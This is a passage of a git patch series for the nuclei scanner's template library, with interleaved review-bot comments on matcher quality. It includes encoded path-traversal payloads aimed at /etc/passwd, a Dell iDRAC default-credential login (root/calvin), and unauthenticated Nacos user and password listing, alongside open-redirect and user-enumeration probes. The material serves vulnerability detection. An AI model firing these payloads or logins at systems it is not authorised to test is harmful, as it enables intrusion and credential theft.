@@ -39,11 +39,11 @@ An overview of the nuclei template directory including number of templates assoc | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | | cves | 206 | vulnerabilities | 98 | exposed-panels | 74 | | exposures | 55 | technologies | 46 | misconfiguration | 48 | -| workflows | 21 | miscellaneous | 13 | default-logins | 11 | +| workflows | 21 | miscellaneous | 14 | default-logins | 11 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**62 directories, 603 files**. +**62 directories, 604 files**. From 1355185b452cb3f0458d70ffdf4b9af417d5a7bc Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Thu, 25 Feb 2021 23:04:21 +0530 Subject: [PATCH 026/370] improved matcher --- vulnerabilities/other/weiphp-path-traversal.yaml | 7 +++---- 1 file changed, 3 insertions(+), 4 deletions(-) diff --git a/vulnerabilities/other/weiphp-path-traversal.yaml b/vulnerabilities/other/weiphp-path-traversal.yaml index ebd26e61b2..b50c3ba268 100644 --- a/vulnerabilities/other/weiphp-path-traversal.yaml +++ b/vulnerabilities/other/weiphp-path-traversal.yaml @@ -42,9 +42,8 @@ requests: matchers: - type: word words: - - php - - hostname - - username - - password + - https://weiphp.cn + - WeiPHP + - DB_PREFIX condition: and part: body \ No newline at end of file From b24a1eecaeb73d9cf491625952bece4a4b5370b9 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 25 Feb 2021 23:21:42 +0530 Subject: [PATCH 027/370] Create wordpress-affiliatewp-allowed-products.yaml --- ...ordpress-affiliatewp-allowed-products.yaml | 22 +++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 vulnerabilities/wordpress/wordpress-affiliatewp-allowed-products.yaml 
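Review bot: The weiphp file still ends without a trailing newline (`\ No newline at end of file` at the end of the hunk), which yamllint flags and which turns every future edit of the last line into a two-line diff; the same applies to all three files added in patch 034 (`dell-idrac-default-login.yaml`, `dell-idrac-detect.yaml`, `dell-idrac-workflow.yaml`). The new word set is otherwise sound: `DB_PREFIX` on its own would match many PHP configuration files, but the `condition: and` with the vendor URL and product name keeps the match specific.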
diff --git a/vulnerabilities/wordpress/wordpress-affiliatewp-allowed-products.yaml b/vulnerabilities/wordpress/wordpress-affiliatewp-allowed-products.yaml new file mode 100644 index 0000000000..f09821fa76 --- /dev/null +++ b/vulnerabilities/wordpress/wordpress-affiliatewp-allowed-products.yaml @@ -0,0 +1,22 @@ +id: affiliatewp-allowed-products + +info: + name: WordPress Plugin "AffiliateWP – Allowed Products" Log Disclosure + author: dhiyaneshDK + severity: low + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/uploads/affwp-debug.log' + + matchers-condition: and + matchers: + - type: word + words: + - 'woocommerce' + condition: and + + - type: status + status: + - 200 From 9bcd36338e14281ec9f7651eadcf3518a490b436 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Thu, 25 Feb 2021 23:38:40 +0530 Subject: [PATCH 028/370] improved matcher --- vulnerabilities/thinkcmf/thinkcmf-lfi.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/thinkcmf/thinkcmf-lfi.yaml b/vulnerabilities/thinkcmf/thinkcmf-lfi.yaml index ed34e44aaf..710cf20b0b 100644 --- a/vulnerabilities/thinkcmf/thinkcmf-lfi.yaml +++ b/vulnerabilities/thinkcmf/thinkcmf-lfi.yaml @@ -20,7 +20,7 @@ requests: - type: regex regex: - "root:[x*]:0:0:" - - "\\[(font|extension|file)s\\]" + - "bit app support" - 'ThinkCMF' part: body From acd1ab4735556f042e8147d94daddd95b310954f Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Fri, 26 Feb 2021 00:21:07 +0530 Subject: [PATCH 029/370] misc changes --- ...d-products.yaml => wordpress-affiliatewp-log.yaml} | 11 ++++++++--- workflows/wordpress-workflow.yaml | 1 + 2 files changed, 9 insertions(+), 3 deletions(-) rename vulnerabilities/wordpress/{wordpress-affiliatewp-allowed-products.yaml => wordpress-affiliatewp-log.yaml} (65%) 
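Review bot: With the new list the third pattern, `'ThinkCMF'`, matches any page the product serves, so unless the matcher's `condition` is `and` (the matcher begins outside the hunk; no `condition` line is visible, and a regex list defaults to `or`) the template fires on every ThinkCMF install regardless of whether the traversal succeeded. Either move `'ThinkCMF'` into its own word matcher combined under `matchers-condition: and`, or confirm that the condition is `and` and say so in a comment. `bit app support` is a plain string used as a regex and works, but the `\\[(font|extension|file)s\\]` pattern it replaces was the more conventional win.ini marker, so keeping both costs nothing.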
diff --git a/vulnerabilities/wordpress/wordpress-affiliatewp-allowed-products.yaml b/vulnerabilities/wordpress/wordpress-affiliatewp-log.yaml similarity index 65% rename from vulnerabilities/wordpress/wordpress-affiliatewp-allowed-products.yaml rename to vulnerabilities/wordpress/wordpress-affiliatewp-log.yaml index f09821fa76..147815db69 100644 --- a/vulnerabilities/wordpress/wordpress-affiliatewp-allowed-products.yaml +++ b/vulnerabilities/wordpress/wordpress-affiliatewp-log.yaml @@ -1,4 +1,4 @@ -id: affiliatewp-allowed-products +id: wordpress-affiliatewp-log info: name: WordPress Plugin "AffiliateWP – Allowed Products" Log Disclosure @@ -14,8 +14,13 @@ requests: matchers: - type: word words: - - 'woocommerce' - condition: and + - 'Referral could not be retrieved' + - 'Affiliate CSV' + + - type: word + words: + - 'text/plain' + part: header - type: status status: diff --git a/workflows/wordpress-workflow.yaml b/workflows/wordpress-workflow.yaml index 0405845185..71d5dc5a5e 100644 --- a/workflows/wordpress-workflow.yaml +++ b/workflows/wordpress-workflow.yaml @@ -43,3 +43,4 @@ workflows: - template: vulnerabilities/wordpress/wp-xmlrpc.yaml - template: vulnerabilities/wordpress/wordpress-zebra-form-xss.yaml - template: vulnerabilities/wordpress/wp-enabled-registration.yaml + - template: vulnerabilities/wordpress/wordpress-affiliatewp-log.yaml From 56557666fbcc4f8935ee4eaf47eba93831344c4a Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 25 Feb 2021 19:06:24 +0000 Subject: [PATCH 030/370] Auto Update README [Thu Feb 25 19:06:24 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 0fbb83b7e5..70dc8daaba 100644 --- a/README.md +++ b/README.md 
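Review bot: The rename to `wordpress-affiliatewp-log` leaves the `name` context line reading `WordPress Plugin "AffiliateWP – Allowed Products" Log Disclosure`, which still attributes the log to the "Allowed Products" add-on although the id, the filename and the new matcher strings (`Referral could not be retrieved`, `Affiliate CSV`) appear to describe AffiliateWP itself; update `name` to match, e.g. `name: WordPress Plugin AffiliateWP Debug Log Disclosure`. The two-word matcher has no `condition`, so it fires on either phrase, which is presumably intended. The workflow addition in the second hunk is fine.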
@@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 206 | vulnerabilities | 98 | exposed-panels | 74 | +| cves | 206 | vulnerabilities | 99 | exposed-panels | 74 | | exposures | 55 | technologies | 46 | misconfiguration | 48 | | workflows | 21 | miscellaneous | 14 | default-logins | 11 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**62 directories, 604 files**. +**62 directories, 605 files**. From dfc59f32afe8780d523d6daa96e9a88ac678c923 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Fri, 26 Feb 2021 00:40:01 +0530 Subject: [PATCH 031/370] ext update --- technologies/{gunicorn-detect.yml => gunicorn-detect.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename technologies/{gunicorn-detect.yml => gunicorn-detect.yaml} (100%) diff --git a/technologies/gunicorn-detect.yml b/technologies/gunicorn-detect.yaml similarity index 100% rename from technologies/gunicorn-detect.yml rename to technologies/gunicorn-detect.yaml From 633499e27baecc594fb3ff47131789ab7fc57064 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 25 Feb 2021 19:10:35 +0000 Subject: [PATCH 032/370] Auto Update README [Thu Feb 25 19:10:35 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 70dc8daaba..05d10da0c3 100644 --- a/README.md +++ b/README.md 
@@ -38,12 +38,12 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | | cves | 206 | vulnerabilities | 99 | exposed-panels | 74 | -| exposures | 55 | technologies | 46 | misconfiguration | 48 | +| exposures | 55 | technologies | 47 | misconfiguration | 48 | | workflows | 21 | miscellaneous | 14 | default-logins | 11 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**62 directories, 605 files**. +**62 directories, 606 files**. From 5241e0f9607fba74f25157dfe1c1374e30a18551 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Fri, 26 Feb 2021 01:16:45 +0530 Subject: [PATCH 033/370] Update open-redirect.yaml --- vulnerabilities/generic/open-redirect.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/vulnerabilities/generic/open-redirect.yaml b/vulnerabilities/generic/open-redirect.yaml index a1c0961a85..74cb0945be 100644 --- a/vulnerabilities/generic/open-redirect.yaml +++ b/vulnerabilities/generic/open-redirect.yaml @@ -20,7 +20,6 @@ requests: - '{{BaseURL}}//example.com/..;/css' - '{{BaseURL}}/example%E3%80%82com' - '{{BaseURL}}/%5Cexample.com' - - '{{BaseURL}}example.com' - '{{BaseURL}}/example.com' - '{{BaseURL}}\example.com' - '{{BaseURL}}//example.com/' From 81e6c97c65bedf1347013ec6a3139109fd0ce264 Mon Sep 17 00:00:00 2001 
From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Fri, 26 Feb 2021 04:01:38 +0530 Subject: [PATCH 034/370] Adding templates for dell-idrac
--- .../dell/dell-idrac-default-login.yaml | 24 +++++++++++ technologies/dell-idrac-detect.yaml | 42 +++++++++++++++++++ workflows/dell-idrac-workflow.yaml | 11 +++++ 3 files changed, 77 insertions(+) create mode 100644 default-logins/dell/dell-idrac-default-login.yaml create mode 100644 technologies/dell-idrac-detect.yaml create mode 100644 workflows/dell-idrac-workflow.yaml
diff --git a/default-logins/dell/dell-idrac-default-login.yaml b/default-logins/dell/dell-idrac-default-login.yaml new file mode 100644
index 0000000000..05cd6e1cb6
--- /dev/null
+++ b/default-logins/dell/dell-idrac-default-login.yaml
@@ -0,0 +1,24 @@
+id: dell-idrac-default-login
+info:
+ name: dell-idrac-default-login
+ author: kophjager007
+ severity: high
+ tags: dell,idrac,dlogin
+
+requests:
+ - method: POST
+ cookie-reuse: true
+ path:
+ - "{{BaseURL}}/data/login"
+ body: "user=root&password=calvin"
+ headers:
+ Host: "{{Hostname}}"
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
+ Content-Type: application/x-www-form-urlencode
+ Referer: "{{BaseURL}}/login.html"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/technologies/dell-idrac-detect.yaml b/technologies/dell-idrac-detect.yaml new file mode 100644
index 0000000000..31618b85bf
--- /dev/null
+++ b/technologies/dell-idrac-detect.yaml
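Review bot: `Content-Type: application/x-www-form-urlencode` is missing the trailing `d`; the value has to be `application/x-www-form-urlencoded`, otherwise the server may not parse `user`/`password` from the body at all and the check becomes meaningless without any error. The only matcher is `status: 200`, and a login endpoint commonly answers 200 for a rejected attempt as well, so at `severity: high` the template needs a body condition that only appears on successful authentication (confirm against a real response) combined under `matchers-condition: and`, not a status code alone. The file also ends without a newline.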
@@ -0,0 +1,42 @@ +id: dell-idrac-detect +info: + name: Detect Dell iDRAC + author: kophjager007 + description: The Integrated Dell Remote Access Controller (iDRAC) is designed for secure local and remote server management and helps IT administrators deploy, update and monitor Dell EMC PowerEdge servers. + severity: info + +requests: + - method: GET + headers: + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 + path: + - "{{BaseURL}}/sysmgmt/2015/bmc/info" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + condition: and + words: + - "iDRACName" + - "BuildVersion" + + extractors: + - type: regex + part: header + regex: + - iDRAC/[0-9]{1,2} + - type: regex + part: body + regex: + - iDRAC[0-9]{1,2} + - type: regex + part: body + name: fwver + group: 1 + regex: + - '"FwVer" *: *"([^"]+)"' \ No newline at end of file diff --git a/workflows/dell-idrac-workflow.yaml b/workflows/dell-idrac-workflow.yaml new file mode 100644 index 0000000000..fef179d8a6 --- /dev/null +++ b/workflows/dell-idrac-workflow.yaml @@ -0,0 +1,11 @@ +id: dell-idrac-workflow +info: + name: Dell iDRAC Security Checks + author: kophjager007 + description: A workflow to identify Dell iDRAC instances and run all related nuclei templates. + tags: workflow + +workflows: + - template: technologies/dell-idrac-detect.yaml + subtemplates: + - template: default-logins/dell/dell-idrac-default-login.yaml \ No newline at end of file From 82fa1598cf3ccec4bd7483cdcead964e983a1c55 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Fri, 26 Feb 2021 00:47:11 +0000 Subject: [PATCH 035/370] Update unauthenticated-airflow.yaml --- misconfiguration/unauthenticated-airflow.yaml | 10 ++++++++-- 1 file changed, 8 insertions(+), 2 deletions(-) 
diff --git a/misconfiguration/unauthenticated-airflow.yaml b/misconfiguration/unauthenticated-airflow.yaml index 4db232a58f..1c14b4f895 100644 --- a/misconfiguration/unauthenticated-airflow.yaml +++ b/misconfiguration/unauthenticated-airflow.yaml @@ -14,9 +14,15 @@ requests: matchers: - type: word words: - - Airflow - DAGs + - "Content-Type: text/html" + part: header + + - type: word + words: + - "Airflow - DAGs" part: body + condition: and - type: status status: - - 200 \ No newline at end of file + - 200 From 1f3b10549000d6b6c3bba10b0de08fe082489d72 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Fri, 26 Feb 2021 08:36:34 +0700 Subject: [PATCH 036/370] Update wordpress-user-enumeration.yaml --- vulnerabilities/wordpress/wordpress-user-enumeration.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/vulnerabilities/wordpress/wordpress-user-enumeration.yaml b/vulnerabilities/wordpress/wordpress-user-enumeration.yaml index f109bebade..c06644e07a 100644 --- a/vulnerabilities/wordpress/wordpress-user-enumeration.yaml +++ b/vulnerabilities/wordpress/wordpress-user-enumeration.yaml @@ -2,7 +2,7 @@ id: wordpress-user-enumeration info: name: Wordpress user enumeration - author: Manas_Harsh + author: Manas_Harsh & daffainfo severity: info tags: wordpress @@ -10,6 +10,7 @@ requests: - method: GET path: - "{{BaseURL}}/wp-json/wp/v2/users/" + - "{{BaseURL}}/?rest_route=/wp/v2/users/" matchers-condition: and matchers: - type: status From b05c058a569519e0e17d47fd4df0183dabb5dcd9 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Fri, 26 Feb 2021 01:56:25 +0000 Subject: [PATCH 037/370] Update unauthenticated-nacos-access.yaml --- .../unauthenticated-nacos-access.yaml | 28 ++++++++++--------- 1 file changed, 15 insertions(+), 13 deletions(-) 
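Review bot: The new header matcher `"Content-Type: text/html"` is a case-sensitive comparison that includes the header name, and HTTP/2 mandates lower-case field names while several proxies emit `content-type` that way over HTTP/1.1 too, so on those targets the `and`-combined template reports nothing; matching `text/html` alone under `part: header` keeps the intent without the casing dependency. The `condition: and` on the single-word body matcher is a no-op. The same header-name casing issue applies to the `"Content-Type: application/json"` matcher added to `unauthenticated-nacos-access.yaml` in patch 037 on the next line.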
diff --git a/misconfiguration/unauthenticated-nacos-access.yaml b/misconfiguration/unauthenticated-nacos-access.yaml index 516f1b6254..f9f82b3b6d 100644 --- a/misconfiguration/unauthenticated-nacos-access.yaml +++ b/misconfiguration/unauthenticated-nacos-access.yaml @@ -1,30 +1,32 @@ id: unauthenticated-nacos-access info: - name: Unauthenticated Nacos access - author: taielab + name: Unauthenticated Nacos access v1.x + author: taielab & @pikpikcu severity: critical - - # References: - # - https://github.com/alibaba/nacos/issues/4593 + issues: https://github.com/alibaba/nacos/issues/4593 requests: - - raw: - - | - GET /nacos/v1/auth/users?pageNo=1&pageSize=9 HTTP/1.1 - Host: {{Hostname}} - User-Agent: Nacos-Server - Content-Length: 2 + - method: GET + path: + - "{{BaseURL}}/nacos/v1/auth/users?pageNo=1&pageSize=9" + - "{{BaseURL}}/v1/auth/users?pageNo=1&pageSize=9" matchers-condition: and matchers: + + - type: word + words: + - "Content-Type: application/json" + part: header + - type: regex regex: - '"username":' - '"password":' - - '"totalCount":' - condition: and part: body + condition: and + - type: status status: - 200 From 6908df0aafa19913b9d47be11783ac32191ca9bc Mon Sep 17 00:00:00 2001 From: oppsec <50470310+oppsec@users.noreply.github.com> Date: Thu, 25 Feb 2021 23:08:24 -0300 Subject: [PATCH 038/370] Create joomla-manifest-file.yaml --- exposures/files/joomla-manifest-file.yaml | 29 +++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 exposures/files/joomla-manifest-file.yaml diff --git a/exposures/files/joomla-manifest-file.yaml b/exposures/files/joomla-manifest-file.yaml new file mode 100644 index 0000000000..20f6322e99 --- /dev/null +++ b/exposures/files/joomla-manifest-file.yaml 
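Review bot: `issues:` is not one of the `info` keys the other templates on this page use (`reference:` in patches 014, 015, 018 and 020); unless the loader accepts arbitrary keys the line is either rejected or silently ignored, and either way the link is lost from report output — rename it to `reference: https://github.com/alibaba/nacos/issues/4593`. Replacing the commented `# References:` block with a real key is otherwise the right direction. `author: taielab & @pikpikcu` mixes a handle prefix into the author value; the other templates here use bare handles.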
@@ -0,0 +1,29 @@
+id: joomla-manifest-file
+
+info:
+ name: joomla manifest file disclosure
+ author: oppsec
+ severity: low
+ description: joomla.xml is a xml file which stores some informations about installed Joomla, like version, files and paths.
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/administrator/manifests/files/joomla.xml"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "admin@joomla.org"
+ - "www.joomla.org"
+ condition: and
+
+ - type: word
+ words:
+ - "application/xml"
+ part: header
+
+ - type: status
+ status:
+ - 200
From 1fbe09c16f69d9226ad2c5c35a65ebc93d2bba03 Mon Sep 17 00:00:00 2001 From: oppsec <50470310+oppsec@users.noreply.github.com> Date: Thu, 25 Feb 2021 23:19:22 -0300 Subject: [PATCH 039/370] Create joomla-htaccess.yaml
--- exposures/files/joomla-htaccess.yaml | 29 ++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 exposures/files/joomla-htaccess.yaml
diff --git a/exposures/files/joomla-htaccess.yaml b/exposures/files/joomla-htaccess.yaml new file mode 100644
index 0000000000..4c88101d8e
--- /dev/null
+++ b/exposures/files/joomla-htaccess.yaml
@@ -0,0 +1,29 @@
+id: joomla-htaccess-file
+
+info:
+ name: Joomla htacces file disclosure
+ author: oppsec
+ severity: info
+ description: Joomla have a htaccess file to store some configuration about HTTP Config, Directory Listening etc...
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/htaccess.txt"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "# @package Joomla"
+ - "# @copyright Copyright (C) 2005 - 2017 Open Source Matters. All rights reserved.g"
+ condition: and
+
+ - type: word
+ words:
+ - "text/plain"
+ part: header
+
+ - type: status
+ status:
+ - 200
From c6e856fe1b2863cef7af99efb0d7bcee279dc0f1 Mon Sep 17 00:00:00 2001
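Review bot: The `name` in the second hunk misspells the file (`Joomla htacces file disclosure`) and its description says `Directory Listening` where `Directory Listing` is meant; both strings are user-visible in scan output, so `name: Joomla htaccess file disclosure` and `description: Joomla ships an htaccess.txt file that stores configuration such as HTTP settings and directory listing options.` read better. In the first hunk, `joomla.xml is a xml file which stores some informations` should read `joomla.xml is an XML file that stores information`. The hard-coded copyright year string with the stray trailing `g` in the second matcher is corrected by patch 042 on this page.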
From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Fri, 26 Feb 2021 03:30:51 +0000 Subject: [PATCH 040/370] Update directory-traversal.yaml --- fuzzing/directory-traversal.yaml | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/fuzzing/directory-traversal.yaml b/fuzzing/directory-traversal.yaml index df2f9d7d23..7c44cee4cc 100644 --- a/fuzzing/directory-traversal.yaml +++ b/fuzzing/directory-traversal.yaml @@ -24,6 +24,13 @@ requests: - "{{BaseURL}}/static/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd" - "{{BaseURL}}/static/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd" - "{{BaseURL}}/./../../../../../../../../../../etc/passwd" + - "{{BaseURL}}/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd" + - "{{BaseURL}}/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd" + - "{{BaseURL}}/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd" + - "{{BaseURL}}/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd" + - "{{BaseURL}}/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd" + - "{{BaseURL}}/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd" + matchers-condition: and matchers: - type: status From 2731d48192f074797e8c1e58e7d4ec452876b15f Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Fri, 26 Feb 2021 10:57:35 +0530 Subject: [PATCH 041/370] misc changes --- {exposures/files => miscellaneous}/joomla-htaccess.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename {exposures/files => miscellaneous}/joomla-htaccess.yaml (100%) diff --git a/exposures/files/joomla-htaccess.yaml b/miscellaneous/joomla-htaccess.yaml similarity index 100% rename from exposures/files/joomla-htaccess.yaml rename to miscellaneous/joomla-htaccess.yaml From 1ffadb03d5387a166530575e0b9af0bc92b9abd6 Mon Sep 17 00:00:00 2001 
From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Fri, 26 Feb 2021 10:58:24 +0530 Subject: [PATCH 042/370] Update joomla-htaccess.yaml --- miscellaneous/joomla-htaccess.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/miscellaneous/joomla-htaccess.yaml b/miscellaneous/joomla-htaccess.yaml index 4c88101d8e..379cb579c1 100644 --- a/miscellaneous/joomla-htaccess.yaml +++ b/miscellaneous/joomla-htaccess.yaml @@ -16,7 +16,7 @@ requests: - type: word words: - "# @package Joomla" - - "# @copyright Copyright (C) 2005 - 2017 Open Source Matters. All rights reserved.g" + - "Open Source Matters. All rights reserved" condition: and - type: word From f749429a7952f62360d5fb9e40a976df374ec3e2 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 26 Feb 2021 05:29:21 +0000 Subject: [PATCH 043/370] Auto Update README [Fri Feb 26 05:29:21 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 05d10da0c3..e1b43d53ba 100644 --- a/README.md +++ b/README.md @@ -39,11 +39,11 @@ An overview of the nuclei template directory including number of templates assoc | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | | cves | 206 | vulnerabilities | 99 | exposed-panels | 74 | | exposures | 55 | technologies | 47 | misconfiguration | 48 | -| workflows | 21 | miscellaneous | 14 | default-logins | 11 | +| workflows | 21 | miscellaneous | 15 | default-logins | 11 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**62 directories, 606 files**. +**62 directories, 607 files**. From 641b2464555e222678b17ecefd7be000148ba055 Mon Sep 17 00:00:00 2001 
From: YashGoti <39102999+YashGoti@users.noreply.github.com> Date: Fri, 26 Feb 2021 11:00:21 +0530 Subject: [PATCH 044/370] Create wp-uploads.yaml --- miscellaneous/wp-uploads.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 miscellaneous/wp-uploads.yaml diff --git a/miscellaneous/wp-uploads.yaml b/miscellaneous/wp-uploads.yaml new file mode 100644 index 0000000000..084e959ee2 --- /dev/null +++ b/miscellaneous/wp-uploads.yaml @@ -0,0 +1,29 @@ +id: wp-uploads + +info: + name: WordPress Upload Directory Listing Enable + author: yashgoti + severity: info + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/uploads/" + - "{{BaseURL}}/wp-content/uploads/2015/" + - "{{BaseURL}}/wp-content/uploads/2016/" + - "{{BaseURL}}/wp-content/uploads/2017/" + - "{{BaseURL}}/wp-content/uploads/2018/" + - "{{BaseURL}}/wp-content/uploads/2019/" + - "{{BaseURL}}/wp-content/uploads/2020/" + - "{{BaseURL}}/wp-content/uploads/2021/" + - "{BaseURL}/wp-content/uploads/cfdb7_uploads/" + matchers: + - type: word + words: + - "Directory listing for" + - "Index of /" + - "[To Parent Directory]" + - "Directory: /" + - type: status + status: + - 200 From fb0116549001cab1ff21948cfed9486e4b5971ca Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Fri, 26 Feb 2021 11:00:36 +0530 Subject: [PATCH 045/370] moving folders around --- {exposures/files => miscellaneous}/joomla-manifest-file.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) rename {exposures/files => miscellaneous}/joomla-manifest-file.yaml (90%) diff --git a/exposures/files/joomla-manifest-file.yaml b/miscellaneous/joomla-manifest-file.yaml similarity index 90% rename from exposures/files/joomla-manifest-file.yaml rename to miscellaneous/joomla-manifest-file.yaml index 20f6322e99..6195def552 100644 --- a/exposures/files/joomla-manifest-file.yaml +++ b/miscellaneous/joomla-manifest-file.yaml 
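Review bot: `name: WordPress Upload Directory Listing Enable` is ungrammatical for a finding title; `name: WordPress Uploads Directory Listing Enabled` reads correctly in scan output. The eight year-specific paths multiply requests per host; if they are kept because the parent directory may be index-protected while year folders are not (confirm), a one-line comment above the list saying so would help the next maintainer. The malformed `{BaseURL}` entry and the missing `matchers-condition` are corrected by patch 047 on this page.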
@@ -1,9 +1,9 @@ id: joomla-manifest-file info: - name: joomla manifest file disclosure + name: Joomla manifest file disclosure author: oppsec - severity: low + severity: info description: joomla.xml is a xml file which stores some informations about installed Joomla, like version, files and paths. requests: From 465ddcec4b54b17a276a0e5f65296a6d9836a06f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 26 Feb 2021 05:31:32 +0000 Subject: [PATCH 046/370] Auto Update README [Fri Feb 26 05:31:32 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index e1b43d53ba..456c4b8e8a 100644 --- a/README.md +++ b/README.md @@ -39,11 +39,11 @@ An overview of the nuclei template directory including number of templates assoc | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | | cves | 206 | vulnerabilities | 99 | exposed-panels | 74 | | exposures | 55 | technologies | 47 | misconfiguration | 48 | -| workflows | 21 | miscellaneous | 15 | default-logins | 11 | +| workflows | 21 | miscellaneous | 16 | default-logins | 11 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**62 directories, 607 files**. +**62 directories, 608 files**. From 9d0bf90c62284d9cc5401bbe478ce9317bfcfdc3 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Fri, 26 Feb 2021 11:04:18 +0530 Subject: [PATCH 047/370] misc changes --- miscellaneous/{wp-uploads.yaml => wp-uploads-listing.yaml} | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) rename miscellaneous/{wp-uploads.yaml => wp-uploads-listing.yaml} (91%) diff --git a/miscellaneous/wp-uploads.yaml b/miscellaneous/wp-uploads-listing.yaml similarity index 91% rename from miscellaneous/wp-uploads.yaml rename to miscellaneous/wp-uploads-listing.yaml index 084e959ee2..90aa73e290 100644 
